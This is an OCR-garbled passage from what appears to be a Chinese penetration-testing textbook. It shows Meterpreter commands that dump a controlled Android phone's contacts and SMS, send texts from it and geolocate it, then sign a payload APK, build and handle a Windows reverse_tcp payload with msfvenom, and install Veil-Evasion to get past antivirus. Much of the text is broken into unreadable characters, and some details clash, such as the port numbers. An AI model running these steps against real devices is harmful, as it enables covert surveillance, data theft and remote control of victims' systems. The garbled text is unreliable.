非 是 通讯 录 、 短 信守， 那么 我 们 试看 来 导出 目标 手机 的 电话 本 。 


meterpreter>dump contacts 


该 命令 执行 之 后 的 结果 如 图 6-25 所 示 。 


meterpreter > dump contacts 
Fetching 175 contacts into list 





Contacts list saved to: contacts dump 20170819223602.txt 


Kle-25 “导出 目标 手机 的 电话 本 


该 通信 录 成 功 地 保存 在 了 dump_20170819223602 中 。 接 下 来 ， 我 们 
试看 来 下 载 目标 手机 的 短信 记录 。 


meterpreter»dump sms 


该 命令 执行 之 后 的 结果 如 图 6-26 所 示 。 





sms_dump 20170820021357 .txt 


图 6-26 ”导出 目标 手机 的 短信 


所 有 这 些 功能 中 最 有 趣 的 是 send_sms， 这 个 命令 可 以 用 被 控制 手机 
问 外 有 发达 短信 。 


meterpreter»send sms 


下 面 给 出 了 完整 的 该 命令 以 及 执行 之 后 的 效果 ， 执 行 完 毕 后 会 问号 
人 码 为 18*******52 的 手机 友 壕 一 条 短信 ， 如 图 6-27 所 示 。 





图 6-27 ”控制 目标 手机 同 指定 手机 友 克 短信 


MeterpreterFH Sz f ZAE Ue BU)pAdA. IRA HEFL 
(18999952 ) 收 到 了 被 控制 手机 发 来 的 短信 ， 如 图 6-28 所 示 。 





10:00 4 Gs 0m 66 
18 2 0 
《河北 唐山 市 电信 A ow 


hello world 


Kle-28 ”指定 手机 收 到 的 短信 
另外 也 可 以 使 用 geolocate 命 令 对 目标 进行 地 理 定 位 。 


meterpreter»geolocate 


16-29 rz E XE PLE] ER AR ICT EI EDT] Ze ES ERIER E o 


ocation: 
ude: 39.631706 
E den itude: 118.127462 





iile ss: https://maps.googleapis.com/maps/api/geocode/json?latlng=39.631706, 
18. 127482856 or=true 


图 6-29 ÆA dE H1] JT HS EU LER] LI 


好 后 面 给 出 的 是 月 标 在 Google 地 图 的 位 置 ， 打 开 一 个 卫星 地 图 输入 
对 应 的 经 纬度 ， 得 到 的 结果 如 图 6-30 所 示 。 





图 6-30 ”在 浏览 右 中 打开 定位 的 地 址 
需要 注意 的 是 ， 这 个 定位 与 实际 的 位 置 存在 一 定 的 误 闫 。 


好 了 ， 到 现在 为 止 ， 我们 已 经 介绍 了 Android 下 的 Meterpreter 功 能 。 
但 是 在 这 个 过 程 中 ， 你 可 能 会 遇见 两 个 问题 第 一 个 是 如 采 你 的 虚拟 机 
中 采用 了 NAT 模 式 ， 那 么 瓯 可 能 会 出 现 虚 拟 机 与 手机 无 法 连接 的 问题 ; 
第 二 个 是 如 果 你 的 Kali 版 本 较 低 的 话 ， 束 可 能 会 出 现 生 成 的 Payload 上 没 
有 全 名 从 而 无 法 在 Android 中 安装 过 的 问题 。 如 果 你 顺利 地 完成 了 上 面 的 
rim 么 束 无 需 但 看 本 节 下 耐 的 内 容 了 。 下 面 给 出 了 这 两 个 问题 的 解 
决 方 法 : 


必要 的 参数 只 有 一 个 人 P 地 址 ， 也 束 是 当 这 个 被 控 剖 运行 之 后 ， 要 去 


KREP. ARRI DNUS H]Kali Linux 2 计算 机 IP 作 为 这 个 
参数 的 值 。 疾 口 使 用 默认 的 即 可 。 这 里 我 是 在 VMware 虚拟 机 中 使 用 
Kali Linux 2， 如 果 联 网 模式 采用 NAT 的 话 ， 就 会 出 现 一 个 问题 ， 在 这 里 
参数 直接 使 用 Kali Linux 2 虚拟 机 地 址 的 话 ， 手 机 感染 了 被 控 端 之 后 ， 是 
找 不 到 Kali Linux 2 虚拟 机 的 (具体 原因 你 可 以 参考 NAT 技 术 ) 。 


所 以 我 们 在 这 里 项 与 的 应 该 是 计算 机 的 耳 地 址 ， 然 后 使 用 问 口 映射 
技术 ， 将 我 使 用 的 计算 机 的 端口 映射 到 虚拟 机 中 。 现 在 的 网 络 结构 如 
下 : 

无 线路 由 器 地 址 : 192.168.1.1 

我 使 用 的 计算 机 的 人 P 地 址 : 192.168.1.100 

手机 的 地 址 : 192.168.1.* 

虚拟 机 的 Kali Linux 2: 192.168.169.130 

注意 这 里 面 payload 的 参数 Lhost 并 不 能 设置 为 虚拟 机 的 Kali Linux 
2: 192.168.169.130， 因 为 这 个 地 址 采用 了 NAT 技 术 ， 除 了 我 使 用 的 计 
算 机 之 外 ， 其 他 的 任何 设备 都 是 看 不 到 它 的 。 所 以 该 参数 要 设置 成 我 使 
用 的 计算 机 的 IP 地 址 : 192.168.1.100， 端 口 可 以 任意 选择 一 个 ， 这 里 面 
我 们 以 9999 为 例 ， 然 后 再 将 这 个 问 口 映射 到 虚拟 机 Kali Linux 2 的 端口 
9999 F- BD HJ, 

端口 映射 的 操作 如 下 : 


首先 在 VMware 虚拟 机 沫 单 中 选中 编辑 ， 然 后 在 弹出 的 下 拉 沫 单 中 
Xp Med estu. TIJTHU ZI IE AU 16-319 T5 - 








名 称 类 型 外 部 连接 xk DHCP 子 网 地 址 
VMnet0 ”桥接 模式 ”自动 桥接 - - - 
vMneti REH... - pud Be Hn 192. 168.80.0 


NAT 模式 NAT 模式 














PHI 


vMnet 信息 
Co 桥接 模式 (将 虚拟 机 直接 和 连接 到 外 部 了 网络) 人 提 ) 
桥接 到 外 : 自动 Eze... 


© NAT 4 5 (5s HL LEESE SEIUE TP HNW 
C fürs Gc e FR Podés rie He CHO C) 




















v dax etis reso dee lE E Pede (V) 
主机 虚拟 适配器 名 称 : VMware PodéirsBns VMnet8 
避 使 用 本 地 DHCP 服务 将 1P 地 址 分 本 给 虚拟 机 (D) | 
FIP (D: 192.168.169. 0 子 网 撞 码 (M): 255.255.255. 0 | 
还 原点 认 设置 (R) 应 用 他 | 


图 6-31 VMware" H Mz HA PY) 28 2 8 


在 图 6-31 上 方 的 虚拟 网 络 列表 中 选中 VMNET8， 然 后 点 击 下 方 
的 NAT 设置” 按钮。 在 弹出 的 窗口 中 ， 点 击 “ 添 加 ”按钮 ， 如 图 6-32 所 
小 。 


NAT 设置 x 





pedis: vmneta 

子 了 网 IP: 192.168.169.0 
子 网 挤 码 : 255.255.255.0 
网 关 IP(G): 192 .168 .169 . 2 


sm 18e E) 





主机 端口 类 型 ”虚拟 机 IP 地 址 Lui 








e 
加 允许 活动 的 Fr | 
回 允 许 任何 组 织 唯一 标识 符 @ 


UDP 超时 (以 秘 为 单位 )(W): 30 
Bersm C: 0 
[7] 启用 IPv6(E) 

IPv6 Biji(6): fdi5:4ba5:5a2b:1008::/64 


DNS i& A (D)... NetBIOS i$ AN)... 





4l» lall 


oOo S å å ëE y 


图 6-32 ”VMware 中 的 NAT 设 置 


在 弹出 的 窗口 中 ， 上 填写 需要 映射 的 疾 口 ， 如 图 6-33 所 示 。 


BEHEA | 
zEa Lm Lp): 


HERI: iQ! TCP(I) (^ UDP(U) 


LUE 
ahi e 


Ti (D): 远程 控制 端口 | 


确定 | 取消 j| 帮助 | 





图 6-33 VMware HERH ys L1 


然后 单 击 “确定 ”>， 以 后 凡是 发 往 我 使 用 计算 机 上 9999 端 口 的 流量 都 
会 转发 到 虚拟 机 的 9999 端 口上 。 


但 是 这 个 apk3t 4^ f 直接 在 Android 主 机 上 运行 ， 因为 现在 的 apk 程 
序 都 需要 一 个 签名 ， 如 果 没 有 这 个 签名 ， 或 者 签名 不 正确 的 话 ， 这 个 程 
序 都 没 办 法 执行 ， 所 以 接 下 来 我 们 要 为 这 个 apk 创 建 一 个 签名 。 


创建 签名 需要 使 用 Keytool、jar signer、zipalign 这 3 个 软件 ，Kali 
Linux 2 中 已经 内置 了 其 中 前 两 个 软件 ， 最 后 一 个 软件 zipalign 需 要 安 


root@kali:~# keytool -genkey -v -keystore my-release-key.Keystore -alias a 





lias name -keyalg RSA -keysize 2048 -validity 10000 


ZERI TRMA CERME A ül6-3ABTz. 


root(Qkali: ~ ooo 


File Edit View Search Terminal Help 
:~# keytool -genkey -v -keystore my-release-key.Keystore -alias alLias 


name -keyalg RSA -keysize 2048 -validity 10000 

Enter keystore password: 

Re-enter new password: 

What is your first and last name? 
[Unknown]: Android 

What is the name of your organizational unit? 
[Unknown]: 七 Stc 

What is the name of your organization? 
[Unknown]: tstc 

What is the name of your City or Locality? 
[Unknown]: TS 

What is the name of your State or Province? 
[Unknown]: HB 

What is the two-letter country code for this unit? 
[Unknown]: CH 

Is CN=Android, OU=tstc, 0=tstc, L=TS, ST=HB, C=CH correct? 
[no]: yes 


Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) wi 
th a validity of 10,000 days 

for: CN=Android, OU=tstc, 0=tstc, L=TS, ST=HB, C=CH 
Enter key password for <alias name> 

(RETURN if same as keystore password): 





图 6-34 ”使 用 keytoo] 创 建 签 名 
接 下 来 需要 使 用 JARsigner 为 APK 文 件 签名 。 


root@kali:~# jarsigner -verbose -sigalg SHA 1withRSA -digestalg SHA1 
-keystore my-release-key.Keystore pentest.apk alias name 


PÍT HJ à A Ede-35 Bras o 


:~# jarsigner -verbose -sigalg SHAlwithRSA -digestalg SHAl -keystore my-releas 

e-key.Keystore pentest.apk alias name 
Enter Passphrase for keystore: 

adding: META-INF/ALIAS NA.SF 

adding: META-INF/ALIAS NA.RSA 

signing: AndroidManifest.xml 

signing: resources.arsc 

signing: classes.dex 
jar signed. 


Warning: 
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, u 


sers may not be able to validate this jar after the signer certificate's expiration dat 
e (2045-01-03) or after any future revocation date. 





图 6-35 ”使 用 JARsigner 进 行 签 名 
然后 使 用 JARsigner 验 证 签名 。 
好 了 ， 到 这 里 我 们 就 完成 了 apk 文 件 的 签名 过 程 。 
6.5.2 Windows?&F A25 F Meterpreter[] si HH 


接 下 来 我 们 来 看 看 在 Windows 下 Meterpreter 都 能 完成 哪些 任务 。 虽 
然 现 在 随 着 移动 设备 的 普及 ，Windows 在 操作 系统 的 市 场 比重 越 来 越 


小 ， 但 它 在 PC 方面 的 优势 是 无 法 取代 的 。 所 以 下 面 以 Windows 为 例 来 介 
绍 Meterpreter 鸭 详细 用 法 ， 同 样 还 是 来 生成 一 个 被 控 病 。 


root@kali:~# msfvenom -p windows/meterpreter/reverse tcp lhost=192.168.169 


.130 lportz5000 -f exe -o /root/payload.exe 





然后 司 动 一 个 主 控 山 ， 第 一 步 征 要 司 动 Metasploit; 


成 功 司 动 Metasploit 之 后: 


msf» use exploit/multi/handler 

msf exploit(handler) » set payload windows /meterpreter/reverse tcp 
payload -»windows /meterpreter/reverse tcp 

msf exploit(handler) > set lhost 192.168.169.130 

lhost => 192.168.169.130 

msf exploit(handler) > set lport5000 

lport =>8888 

msf exploit(handler) » exploit 

[*] Started reverse TCP handler on 192.168.169.130:5000 

[*] Starting the payload handler... 





我 们 将 生成 的 payload 复 制 到 虚拟 机 Windows 7 中 ， 然 后 执行 这 个 文 
件 。 在 主 控 端 就 可 以 打开 一 个 Meterpreter 控 制 会 话 (session) 。 


[*] Sending stage (957487 bytes) to 192.168.169.131 
[*] Meterpreter session 1 opened (192.168.169.130:8888 -> 192.168.169.131: 


49229) at 2017-08-21 04:10:09 -0400 
meterpreter» 





这 时 就 会 打开 一 个 控制 会 话 ， 很 多 时 候 我 们 需要 使 用 Kali 控 制 多 个 
设备 ， 这 时 束 会 创造 多 个 会 话 ， 每 一 个 会 话 对 应 一 个 连接 ， 如 果 和 需要 在 
这 些 会 话 之 间 进 行 切 换 的 话 ， 束 可 以 使 用 sessions [id] 的 方式 切换 到 指定 
会 话 。Meterpreter 中 支持 的 命令 有 很 多 ， 一 共 可 以 分 成 9 个 各 类， 分别 
为 : 


e 核心 命令 Core Commands 
e 文件 系统 命令 File System Commands 
e 网 络 命令 Networking Commands 


系统 命令 System Commands 
用 户 接 口 相 关 命 令 User Interface Commands 
摄像 头 相 天命 令 Webcam Commands 

控制 权限 提升 命令 Elevate Commands 
密码 数据 库 命 


人 


其 中 核心 命令 包括 : 


bgkill 
bglist 
bgrun 
channel 
close 
exit 

get timeouts 
help 
info 

irb 

load 
migrate 
quit 
read 
resource 
run 
sessions 
set timeouts 
sleep 
use 

uuid 
write 


关闭 一 个 后 台 的 meterpreter 脚 本 


列 出 所 有 正在 运行 的 后 合 脚本 


将 一 个 meterpreter 脚 本 以 后 台 线 程 模式 运行 


显示 或 者 控制 一 个 活动 频道 

关闭 一 个 频道 

终 目 meterpreter 会 话 
获得 当前 会 话 的 timeout 值 
F HJ ER. 
显示 Post 模 块 的 信息 

进入 Ruby 脚本 模式 
加 载 neterpreter 扩 展 

将 会 话 迁 移 到 一 个 指定 PID 的 进程 
结束 meterpreter 会 话 
从 频道 中 读 取 数据 
运行 文件 中 的 命令 


执行 一 个 meterpreter 脚 本 或 者 Post 模 块 


快速 地 切换 到 男 一 个 会 话 
设置 当前 会 话 的 timeout 值 


使 Meterpreter 静默 ， 重 新 建立 会 话 


与 ' load ' 相 同 ， 已 过 时 
获得 当前 会 话 的 UUID 
将 数据 写 入 到 一 个 频道 1 


这 些 命 仿 中 最 为 第 用 的 有 如 下 几 条 : 


Sessions Q, HEMS I LARR, Wa MEH sessions g 


^» Password database Commands 
时 间 惟 相关 命令 Timestomp Commands 





来 显示 所 有 的 会 话 。 





msf exploit(handler) > sessions 
Active sessions 


Connection 


1meterpreter x86/windows  DH-CA8822AB9589MAdministrator (0 DH-CA8822AB9589 


Information 


192.168.169.130:8888 -» 192.168.169.135:1082 (192.168.169.135) 





backgroud 命 令 ， 这 条 命令 可 以 将 当前 会 话 切 换 到 后 台 ， 这 样 我 们 
束 可 以 返回 到 上 一 级 的 模块 控制 处 。 


meterpreter> background 
[*] Backgrounding session 1... 
msf exploit(handler) » 


返回 到 这 里 我 们 就 可 以 完成 很 多 在 渗透 模块 中 的 操作 ， 如 果 现 在 要 
切换 回 控制 会 话 ， 可 以 使 用 “session -i 编号 ”命令 就 可 以 切换 到 编写 n 的 
会 话 处 ， 例 如 我 们 现在 要 切换 回 对 话 1， 束 可 以 使 用 以 下 命令 : 


msf exploit(handler) > sessions -i1 
[*] Starting interaction with 1... 
meterpreter» 


Migrate 命 令 是 一 条 十 分 有 用 的 命令 ， 可 以 将 我 们 现在 的 Meterpreter 
迁移 到 一 个 指定 的 进程 中 ， 现 在 这 个 Meterpreter 位 于 一 个 独立 的 进程 或 
者 一 个 可 能 随时 被 结束 的 进程 中 ， 我 们 可 以 使 用 这 个 命令 将 其 转移 到 一 
个 系统 进程 中 。 


load 命 令 可 以 用 来 加 载 一 个 Meterpreter 插 件 ， 可 以 使 用 load -1 命令 来 
合 看 所 有 可 以 加 载 的 插件 ， 如 图 6-36 所 示 。 





图 6-36 ” 合 看 所 有 可 以 加 载 的 插件 


Run 命 令 可 以 用 来 执行 一 个 Meterpreter 后 渗透 测试 脚本 。 
Exit 命 令 用 来 退出 当前 Meterpreter 控 制 会 话 。 


下 面 我 们 来 看 看 音 用 的 文件 系统 命令 ， 当 在 目标 系统 上 取得 了 一 个 
Meterpreter 控 制 会 话 之 后 ， 我 们 就 可 以 控制 远程 系统 的 文件 了 ， 一 个 是 


我 们 Kali Linux 2 虚拟 机 (也 就 是 本 地 主机 )〉) ， 一 个 是 被 远程 控制 的 主 
机 。 对 文件 进行 操作 的 命令 如 下 : 


cat 读 取 并 输出 到 标准 输出 文件 的 内 容 
cd 更 改 目 孙 
checksum 重新 计算 文件 的 校 验 码 
cp 将 文件 复制 到 指定 位 置 
dir 列 出 文件 
download 下 载 一 个 文件 或 者 文件 夹 
编辑 文件 
打印 本 地 目录 
打印 工作 目录 
更 改 本 地 目录 
打印 本 地 目录 
列 出 当前 目录 中 的 文件 
创建 一 个 目录 
从 原 地 址 移动 到 目的 地 址 
打印 工作 目录 
删除 指定 文件 
rmdir 删除 指定 目录 
search 查找 文件 
show mount 列 出 所 有 的 驱动 右 
upload 上 传 一 个 文件 或 者 目录 


在 meterpreter 中 默认 操作 的 是 远程 的 和 被 控制 病 操 作 系 统 ， 上 面 的 命 
令 都 可 以 使 用 ， 下 面 我 们 以 实例 来 泗 示 这 些 命令 的 使 用 方法 。 


首先 来 查看 这 人 台 主 机 系统 中 都 包含 了 哪些 文件 ， 可 以 使 用 "1s” 命 
令 ， 如 图 6-37 所 示 。 








2011-09-20 05:03:55 -0400 Ad d (32-bit).Lnk 
2011-09-27 23:45:59 -0400 Shortcut to 0LLyDBG.EXE.Lnk 
0 WinHex.exe.lnk 





fil 
fil u 
fil 2011-09-27 23:46:17 -0400 Shortcut to WinH 
fil 2011-09-27 23:46:27 -0400 Shortcut to procexp.exe.lnk 
fil 2011-10-10 23:23:18 -0400 kingvi html 


图 6-37 ”但 看 所 有 的 文件 


这 里 显示 的 系统 当前 的 目录 ， 在 命令 行 中 操作 的 话 ， 只 能 在 当前 目 
录 中 进行 。 便 用 pwd 命 令 吏 可 以 查看 当前 命令 操作 的 目录 。 


meterpreter»pwd 


如 由 需要 对 其 他 目录 中 的 内 容 进 行 控 制 ， 需 要 切换 到 其 他 目录 。 这 
里 面 可 以 使 用 cq” 命令 来 切换 ， 例 如 我 们 需要 看 看 目标 的 C 盘 中 都 有 哪 
些 文件 ， 束 可 以 执行 命令 cd。 


meterpreter>cd c:/ 


这 样 就 将 默认 日 录 切换 到 了 c 盘 。 我 们 再 执行 ls 命令 
中 的 所 有 内 容 ， 如 图 6-38 所 示 。 


KI 
>| 
aS 
a 
A 
C 
ER 


root@kali: ~ o o Q 
File Edit View Search Terminal Help 


meterpreter > ls 
Listing. ce 


Last modified Name 


40777/rwxrwxrwx di 2015-06-02 21:52:54 - $Recycle.Bin 
100444/r--r--r-- 2015-06-02 21:39:49 - BOOTSECT . BAK 
2015-06-02 21:39:43 - Boot 

2009-07-14 00:53:55 - Documents and Set 


40777/rwxrwxrwx 
40777/rwxrwxrwx 


40777/rwxrwxrwx 2017-07-29 02:17:44 - EFS Software 
rfLogs 


2009-07-13 22:37:05 - 
2017-07-07 03:14:01 - Program Files 

ir 2015-06-03 03:15:03 - ProgramData 
2015-06-02 21:51:05 - Recovery 
2017-08-21 03:22:14 - System Volume Inf 


2015-06-02 21:51:16 - Users 
2017-07-07 03:16:33 - Windows 

4 fiL 2009-06-10 17:42:20 - autoexec.bat 
/ r--r-- 383786 j 2010-11-20 16:29:06 - ootmgr 

10 fiL 2009-06-10 17:42:20 - 
100666/rw-rw-rw- 1073741824 j 2017-08-22 03:19:44 - 
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令 “mkdir*”， 例 如 我 们 想 要 创建 一 个 名 为 “Metasploit” 的 文件 夹 ， 束 可 以 
使 用 命令 mkdir。 


这 样 束 可 以 在 目标 的 C 杞 中 创建 一 个 名 为 “Metasploit”* 的 文件 夹 。 


“search” 命 令 可 以 用 来 查找 目标 系统 中 感 兴 趣 的 文件 ， 例 如 查找 一 
个 系统 中 的 txt 格 式 的 文档 ， 束 可 以 执行 search。 


meterpreter» search -f *.txt 


找到 了 感 兴趣 的 文件 ， 束 可 以 将 这 个 文件 下 载 到 日 己 的 Kali Linux 2 
虚拟 机 上 。 下 载 所 使 用 的 命令 为 “download”。 


这 里 我 们 只 是 对 meterpreter 的 主要 功能 进行 了 介绍 ， 如 果 你 想 对 


0 
0 
0 
0 
0 
0 
0 
0 
0 
0 
2 





meterpreter 进 行进 一 步 的 深入 了 解 ， 可 以 访问 offensive security 的 主页 
https://www.offensive-security.com/ metasploit-unleashed/meterpreter- 
basics/ 来 进行 更 深入 的 和 学习 ， 也 可 以 陪读 我 翻译 过 的 《精通 metasploit 涂 
透 测试 》 一 书 。 


6.6 ”使 用 Veil-Evasion 绕 过 杀毒 软件 


在 大 多 数 人 们 的 心目 中 都 会 认为 一 个 安 妆 了 杀毒 软件 的 系统 台 是 安 
全 的 。 因 为 杀毒 软件 会 请 除 挥 所 有 对 系统 有 害 的 程序 。 不 于 的 是 ， 事 实 
往往 事与愿违 。 以 前 我 在 诛 笔 上 讲 到 远程 控制 时 ， 残 有 学 生 兽 经 问 道 ， 
系统 只 要 安 闻 一 个 杀毒 软件 吏 可 以 摘 定 所 有 的 木马 ， 我 们 现在 还 学 习 远 
程控 制程 序 有 什么 用 呢 ? 是 不 是 当 我 们 只 要 在 目标 主机 上 一 运行 
Payload， 束 立刻 会 被 录 毒 软件 友 现 并 被 清除 挥 呢 ? 


如 果真 的 是 这 样 的 话 ， 那 么 任何 的 Payload 束 部 没有 用 途 了 。 不 过 
事实 并 非 如 此 ， 接 下 来 我 们 来 介绍 一 些 可 以 逃 过 杀毒 软件 得 杀 的 方法 。 
其 实 方法 有 很 多 ， 但 是 其 中 很 多 优秀 的 方法 需要 一 些 编 详 和 汇编 的 知 
识 ， 这 里 我 们 只 介绍 一 种 简单 的 而 且 可 以 躲 过 杂 毒 软件 查 杀 的 工具 
Veil。 许 多 的 杀毒 软件 都 采用 了 模式 匹配 或 者 特征 匹配 的 工作 模式 ， 如 
末 一 个 程序 中 不 存在 病毒 库 中 的 特征 码 ， 那 么 杀毒 软件 就 不 会 认为 这 是 
一 个 病毒 文件 。 因 此 我 们 需要 修改 或 者 掩 兰 恶意 软件 的 特征 本 ， 这 样 杀 
每 软件 束 很 有 可 能 个 会 阻止 这 个 软件 的 运行 。 


6.6.1 ”Veil-Evasion 的 安装 


在 Kali Linux 2 中 并 没有 安装 好 Veil， 所 以 我 们 需要 手动 安装 。 在 终 
9m FH f “apt-get install veil-evasion” 命 令 并 执行 ， 如 图 6-39 所 示 。 
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P 
root(Qkali: ~ ooo 
File Edit View Search Terminal Help 


:~# apt-get install veil-evasion 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following additional packages will be installed: 
binutils-mingw-w64-i686 binutils-mingw-w64-x86-64 ca-certificates-mono cli-common 
g---mingw-w64 g++-mingw-w64-i686 g---mingw-w64-x86-64 gcc-mingw-w64 
gcc-mingw-w64-base gcc-mingw-w64-1686 gcc-mingw-w64-x86-64 geoclue-2.0 
gfortran-mingw-w64 gfortran-mingw-w64-1686 gfortran-mingw-w64-x86-64 gnat-mingw-w64 
gnat-mingw-w64-base gnat-mingw-w64-1686 gnat-mingw-w64-x86-64 gnome-mime-data 
golang golang-1.7 golang-1.7-doc golang-1.7-go golang-1.7-src goLang-doc golang-go 
golang-src libart-2.0-2 libart2.0-cil libbonobo2-0 Libbonobo2-common libbonoboui2-0 
libbonoboui2-common libgconf2.0-cil libgdiplus libglade2.0-cil libglade2.0-cil-dev 
libglib2.0-cil libglib2.0-cil-dev libgnome-2-0 libgnome-vfs2.0-cil libgnome2-common 
libgnome2.24-cil libgnomecanvas2-0 libgnomecanvas2-common libgnomeui-0 
libgnomeui-common libgnomevfs2-0 libgnomevfs2-common libgnomevfs2-extra 
libgtk2.0-cil libgtk2.0-cil-dev libgtkspellð libjavascriptcoregtk-1.0-0 
libmono-2.0-dev libmono-accessibility4.0-cil libmono-cairo4.0-cil 
libmono-cecil-private-cil libmono-cil-dev libmono-codecontracts4.0-cil 
libmono-compilerservices-symbolwriter4.0-cil libmono-corlib4.5-cil 
libmono-cscompmgd0.0-cil libmono-csharp4.O0c-cil libmono-custommarshalers4.0-cil 
libmono-data-tds4.0-cil libmono-db2-1.0-cil libmono-debugger-soft4.0a-cil 
libmono-http4.0-cil libmono-il8n-cjk4.0-cil libmono-il8n-mideast4.0-cil 
libmono-il8n-other4.0-cil libmono-il8n-rare4.0-cil libmono-il8n-west4.0-cil 
libmono-i18n4.0-all libmono-il18n4.0-cil libmono-ldap4.0-cil 
libmono-management4.0-cil libmono-messaging-rabbitmg4.0-cil 
libmono-messaging4.0-cil libmono-microsoft-build-engine4.0-cil 
libmono-microsoft-build-framework4.0-cil libmono-microsoft-build-tasks-v4.0-4.0-cil 
lihmana-micrnoacaoft-huiild-intilitieac-uA A-A Q-cil lihmana-micracaft-hiildA 0-cil 





图 6-39 在 Kali Linux 2 中 安装 Veil-evasion 


当 安 闭 完 成 之 后 ， 驶 可 以 使 用 这 个 工具 了 。 你 可 以 在 Applications 里 
的 第 13 个 分 类 “Social Engineering Tools” H P 3v 5 F 4X l| veil-evasion, 
如 图 6-40 所 示 。 
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! - Reverse Engineering social engi 
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Post Exploitation VER-CVOSON 
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Kl6-40 ”在 Applications 中 局 动 veil-evasion 


第 一 次 局 动 这 个 程序 的 时 候 ， 会 在 命令 窗口 出 现 一 个 安 疹 界 面 ， 
里 我 们 选择 y， 它 将 会 目 动 开始 安装 ， 如 图 6-41 所 示 。 
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Terminal 


|y File Edit View Search Terminal Help 


[?] Are you sure you wish to install Veil-Evasion? 


Continue with installation? ([y]/[s]ilent/[N]o): [] 





图 6-41 ”为 Veil-Evasion 安 装 支持 环境 


Veil-Evasion 的 使 用 需要 环境 的 支持 ， 现 在 就 开始 安装 相关 的 支持 
文件 了 〈 见 图 6-42) 。 


Applications v Places v Terminal v Wed 20:24 


Terminal 


į File Edit View Search Terminal Help 


[?] Are you sure you wish to install Veil-Evasion? 


Continue with installation? ([y]/[s]ilent/[N]o): y 


W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease Could 
not resolve 'http.kali.org' 
图 W: Some index files failed to download. They have been ignored, or old ones used 
instead . 


[*] Creating ne 


i | wine: chdir to /root/.config/wine/veil 





Kl6-42 ”开始 安装 文 持 环 境 


Veill-Evasion 的 使 用 需要 Python、pywin32、pycrypto 和 Ruby 的 文 
持 ， 所 以 ri E ARX AA ACIE à 目 完 在 这 个 时 候 会 弹 出 一 个 Python 安装 
的 屏 医 ， 单 击 “*Next" 投 钮 ， 如 图 6-43 所 示 。 


Python 2.7.5 Setup 


Select whether to install Python 2.7.5 
for all users of this computer. 


C Install just for me (not available on Windows Vista) 





Cancel | 





多 6-43  ZzJPython2.7.5 


在 为 Python 选择 安装 目录 的 地 方 ， 保 留 默认 设置 ， 选 择 *Next” 按 钮 
即 可 ， 如 图 6-44 所 示 。 


Python 2.7.5 Setup 


Select Destination Directory 





Please select a directory for the Python 2.7.5 files. 


B [Python27 "| up| New | 





python 
wind BS 


Cancel | 





图 6-44 ”选择 安装 目录 
如 果 之 前 系统 已 经 安装 好 Python 的 话 ， 系统 这 时 会 弹出 一 个 所 未 
窗口 ， 询 问 是 否 履 盖 ， 这 里 单 击 *NO” 即 可 结束 安装 ， 和 否则 跳 过 此 步骤 
即 可 ， 如 图 6-45 上 所 示 。 


Python 2.7.5 Setup 


CPythonz7 exists, Are you sure vou 
want to overwrite existing files? 





Tes 
Kl6-45  Jé 1048 ni 25 LI 


在 Python 的 组 件 选 择 中 ， 保 持 默 认 人 设置 妈 可 ， 早 击 “Next” 按 钮 ， 如 
图 6-46 所 示 。 


Python 2.7.5 Setup 


Customize Python 2.7.5 


Select the way you want features to be installed. 
Click on the icons in the tree below to change the 
way features will be installed. 





v Register Extensions 
+ |Tcl/Tk 

~ [Documentation 

+ [Utility Scripts 

v |Test suite 


J 
e 


p U t h f1 The size of the currently selected item. 





2 
Multiline description of the currently selected item. 








windows 


Disk usage | Advanced | < Back | Next » | Cancel | 
图 6-46 ”上 自 定 义 安装 


到 此 为 止 ， 单 击 安装 屏幕 上 的 “Finish” 按 钮 ，Python 2.7.5 就 安装 到 
你 的 计算 机 上 了 ， 如 图 6-47 所 示 。 





图 6-47 ”安装 完成 


接 下 来 ， 安 装 脚本 会 继续 安装 pywin32， 这 是 一 个 用 来 访问 
Windows 系 统 API 的 库 。 这 个 工具 的 安 厂 过 程 也 很 简单 ， 你 只 需 一 步 步 
地 单 击 “Next” 按 钮 即 可 ， 如 图 6-48 所 示 。 


PYTHON 
Powered 





图 6-48 ”pywin32 的 安装 界面 
接 下 来 要 选择 安装 目录 ， 如 图 6-49 所 示 。 


- PYTHON 
Powered 








图 6-49 ”为 pywin32 选 择 安装 目录 
然后 进入 安装 的 过 程 ， 耐 心 等 待 即 可 ， 如 图 6-50 所 示 。 


| 


PYTHON 
POwered 





图 6-50 JT zc pywin32 
当 和 安装 结束 之 后 ， 束 会 弹出 一 个 完成 者 面 ， 如 图 6-51 所 示 。 


G — —Á 


T PYTHON 


Powered 





Kle-51 ”安装 结束 
Hah*Finish"TZ4H, WEIER f pywin328 zz xt f. 
安装 脚本 还 要 会 安装 pycrypto， 这 是 一 个 专门 用 来 加 密 解密 的 模 


块 。 安 浅 方法 和 pywin32 一 样 ， 一 直 单 击 “Next” 按 钮 ， 直 到 “Finish” 按 钮 
出 现 即 可 ， 如 图 6-52 所 示 。 








图 6-52 ”pycrypto-2.6 的 安装 
接 下 来 ， 系 统 会 安装 Ruby 环 境 。 首 先 会 让 我 们 选择 一 个 使 用 的 语 
言 ， 这 里 选择 默认 的 “English” 即 可 ， 如 图 6-53 所 示 。 


Select Setup Language e 


Select the language to use during the 
installation: 








English 


Cancel | 
图 6-53 ”为 pycrypto 选 择 语言 


接 下 来 就 会 开始 Ruby 的 安装 。 首 先是 Ruby 的 使 用 许可 ， 选 择 “ 接 
受 ” 以 后 ， 单 击 *Next” 按 钮 即 可 ， 如 网 6-54 所 示 。 





Ruby 1.8.7-p371 License Agreement 





Copyright (c) 2007-2011 RubyInstaller Team . 
All rights reserved. 


Except: 


Ruby is copyrighted free software by Yukihiro Matsumoto. 
http:/www.ruby-lang.org/en/L ICENSE Ext 


The Book of Ruby is copyrighted by Huw Collingbourne. 
http:/Iwww.sapphiresteel.com/The-Book-Of -Ruby 





图 6-54 Frin% Ruby 
为 Ruby 选 择 安装 目录 ， 如 图 6-55 所 示 。 





Installation Destination and Optional Tasks 











图 6-55 Ruby 的 目录 安装 
单 击 “*Install” 按 钮 之 后 ， 会 开始 安装 过 程 ， 直 到 最 后 出 现 Finish 界 面 
为 止 ， 如 图 6-56 所 示 。 


Setup - Ruby 1.8.7-p371 o 


Completing the Ruby 1.8.7-p371 
Setup Wizard 

Setup has Finished installing Ruby 1.8.7-p371 on your 
computer, The application may be launched by selecting the 
installed icons. 


Click Finish to exit Setup. 


Web Site: http:/Jrubyinstaller .org 
Support group: http://groups.google.com/group/rubyinstaller 
